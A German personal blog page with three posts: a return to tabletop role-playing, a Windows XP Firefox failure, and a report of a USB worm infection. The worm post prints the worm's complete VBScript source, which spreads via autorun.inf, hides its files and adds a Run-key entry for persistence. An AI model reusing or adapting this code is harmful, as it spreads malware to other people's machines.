Posts Tagged “Virus”

Oldsk00l Baby! Fux goes Pen&Paper #dsa

Jul 7, 2009 Posted Under: Allgemeines Read More

Nach fast 10 Jahren habe ich mich dank des umwerfenden Streifens Astropia wieder mit dem Pen&Paper-Virus infiziert, und gleich noch Ecki und Kaddy angesteckt.

Mein damaliges Lieblingssystem war ja Das schwarze Auge, logisch dass ich mich auch 25 Jahre nach Erscheinen dieses Systems wieder dafür entschieden habe, oder?

Also gleich mal ab ins Internet (harhar, als ob ich jemals offline wäre – ausser vielleicht im Schlaf, aber da arbeite ich auch noch dran) und das Grundregelwerk sowie ein Würfel-Set bestellt (btw. eine auf 10.000 Sets limitierte Edition, ich hab Nr. 09.739 *g*).

Heute kam das Paket dann auch an, und ich habe gleich mal eine “große” Outboxing-Fotosession gemacht – so aufgeregt bin ich sonst nur bei einem neuen Computer.

Leider musste ich dann auch direkt nochmal in die Stadt, noch ein paar (12) W6er kaufen, 4 sind meines Erachtens nach zu wenig *g* – ich erinner mich noch mit Grausen an eine Session wo ich mit 20 (in Worten: ZWANZIG) W6ern würfeln musste, da reichte der Würfelbecher nicht mehr, da musste es schon Mutterns Rührschüssel sein *g*

Und natürlich brauchte ich auch noch Pen (Bleifitze) und Paper (Schulhefte) samt Zubehör – man kann ja nicht immer nen Netbook neben dem Würfelbecher stehen haben, oder?

Jetzt gilt es nur noch im Dessauer Umland noch ein paar Rollenspieler aufzutreiben, 3 sind doch etwas zu wenig, da ich ja erstmal “meistern” muss…

Das Päckchen ist angekommen

Bild 1 von 10

Toller Trojaner terrorisiert trotteligen Techie

Mai 29, 2009 Posted Under: IT, Windows Read More

Ja Leute, jetzt ist es passiert, der Fux hat sich ‘nen Virus eingefangen!

Das ist etwas ganz besonderes für mich, meinen letzten Virus hatte ich irgendwann im letzten Jahrtausend an meinem alten Amiga 500 ;-)

Aber heute ist es dann passiert, zum “Glück” an einem nicht am Netz hängenden Rechner kam mittels eines USB-Sticks ein leicht lästiger Plagegeist angeschlichen.

Das Kind kommt in Form zweier Dateien daher: Einer autorun.inf und einer <rechnername>.vbs und SCHEINT nichts anderes zu machen als sich selber immer wieder zu starten (renitentes kleines Viecherl) und den Titel des IE in “Hacked by <Rechnername>” zu ändern.

Auch der “Quellcode” sieht eher nach Nerv- denn nach Schadsoftware aus, ich vermute mal als Author ein 12jähriges Scriptkiddie, das gerade die ersten 2 Kapitel seines VB-Buches hinter sich hat.

Damit wir alle herzlich lachen können häng ich den Code mal rein, evtl. kann ja der ein oder andere VisualBasic-Experte mal einen Blick drauf werfen und seine Meinung kund tun, ich selber “spreche” kein VB, aber nach allem was ich sehe ist das Teil nicht wirklich schädlich.

‘Mutation of Trojan virus.
‘My name is DORFL.vbs
On error resume next
Dim mysource,winpath,flashdrive,fs,mf,atr,tf,rg,nt,check,sd,oldname,newname,rgname
Set fs = createobject("Scripting.FileSystemObject")
Set wn = WScript.CreateObject("WScript.Network")
Set mf = fs.getfile(Wscript.ScriptFullname)
oldname=CStr(fs.getfilename(Wscript.ScriptFullname))
newname = wn.ComputerName & ".vbs"
rgname = Replace(newname,".vbs","")
atr = "[autorun]"&vbcrlf&"shellexecute=wscript.exe DORFL.vbs"
dim text,size
size = mf.size
check = mf.drive.drivetype
Set text=mf.openastextstream(1,-2)
do while not text.atendofstream
mysource=mysource&text.readline
mysource=mysource & vbcrlf
Loop
mysource=Replace(mysource,oldname,newname)
do
Set winpath = fs.getspecialfolder(0)
Set tf = fs.getfile(winpath & "\SYSTEM32\" & newname)
tf.attributes = 32
Set tf=fs.createtextfile(winpath & "\SYSTEM32\" & newname,2,true)
tf.write mysource
tf.close
Set tf = fs.getfile(winpath & "\SYSTEM32\" & newname)
tf.attributes = 39
For each flashdrive in fs.drives
If (flashdrive.drivetype = 1 or flashdrive.drivetype = 2) and flashdrive.path <> "A:" Then
Set tf=fs.getfile(flashdrive.path &"\DORFL.vbs")
tf.attributes =32
Set tf=fs.createtextfile(flashdrive.path &"\DORFL.vbs",2,true)
tf.write mysource
tf.close
Set tf=fs.getfile(flashdrive.path &"\DORFL.vbs")
tf.attributes =39
Set tf =fs.getfile(flashdrive.path &"\autorun.inf")
tf.attributes = 32
Set tf=fs.createtextfile(flashdrive.path &"\autorun.inf",2,true)
tf.write atr
tf.close
Set tf =fs.getfile(flashdrive.path &"\autorun.inf")
tf.attributes=39
End If
next
Set rg = createobject("WScript.Shell")
rg.regwrite "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\" & rgname & "",winpath&"\SYSTEM32\" & newname
rg.regwrite "HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\Window Title","Hacked by " & Replace(oldname, ".vbs","")
if check <> 1 then
Wscript.sleep 120000
End if
loop while check<>1
Set sd = createobject("Wscript.shell")
sd.run winpath&"\explorer.exe /e,/select, "&Wscript.ScriptFullname

Es handelt sich übrigens um einen HTML/Rce.Gen Virus, falls das interessiert ;-)

Windows macht was es will

Mrz 14, 2009 Posted Under: IT, Windows Read More

Nach langer Abstinenz mal wieder was neues vom Cyberfux.

Nachdem das Motherboard meines Hauptrechners mir wegen eines geplatzten ElKos kündigte (da schalte ich den EINMAL über Nacht ab, und prompt verträgt der keine Minusgrade) und ich den Rechenknecht somit neu aufbauen durfte ist (oh Graus) jetzt Windows drauf!

Allerdings kein Vista, sondern das “gute alte” XP Pro mit SP3 – allerdings auch mehr gezwungenermaßen, da ich in letzter Zeit vermehrt Access-Lösungen basteln musste.
Der Hauptgrund für ein “Vollzeitwindows” war dann aber doch Fallout 3 – nach dem Erscheinen hab ich den Rechner eh fast nur noch im Windows betrieben ;-)

Aber btt:
Was mir gestern passiert ist lässt mich an der Richtigkeit meiner Entscheidung zweifeln – von einem Schlag auf den anderen startete mein Firefox nicht mehr, statt dessen kam nur noch der “Mozilla Absturzmelder” (oder wie das Ding heißt).
Stundenlanges rumgegoogle brachte auch keine Hilfe, denn alle Tips (wie zB sicherer Modus) funktionierten nicht. Im Taskman tauchte der Proc erst gar nicht auf, und auch sonst hatte sich der Rechner etwas eigenwillig.
Das fing an, das sich mir sämtliche Systemschriftarten verstellt hatten – fragt mich bitte nicht wieso, es war kein Virus (that’s for sure) und auch ich habe nichts gemacht was soetwas provoziert hätte (jaja, DAU-Ausrede, hier stimmts aber mal).

Also mittels eines Registry-Tweaks alle Schriftarten wieder auf Standard gesetzt, und PENG Firefox wollte nicht mehr.
Profil gelöscht – Keine Besserung
FF deinstalliert, alle Reste manuell bzw. mit Ccleaner entfernt, Neustart, Neuinstallation – Keine Besserung
Im Firefox-Chat nachgefragt, dort auch nur WTF geernte ;-(

Letzten Endes hab ich heute das System neu eingespielt (Clonezilla sei dank ja eine recht fixe Angelegenheit) und alles war wieder tutti.

Aber warum der Fehler auftrat und wie er zu reproduzieren ist, da schweigen die Götter!

Hoffentlich kann Linux (bzw. Wine) bald mit Access, VisualStudio, Fallout 3, Archlord und Sims 2 umgehen, dann kann ich wenigstens wieder dauerhaft ein sicheres und stabiles System ntuzen ;-)

Also bis denn, Euer

Cyberfux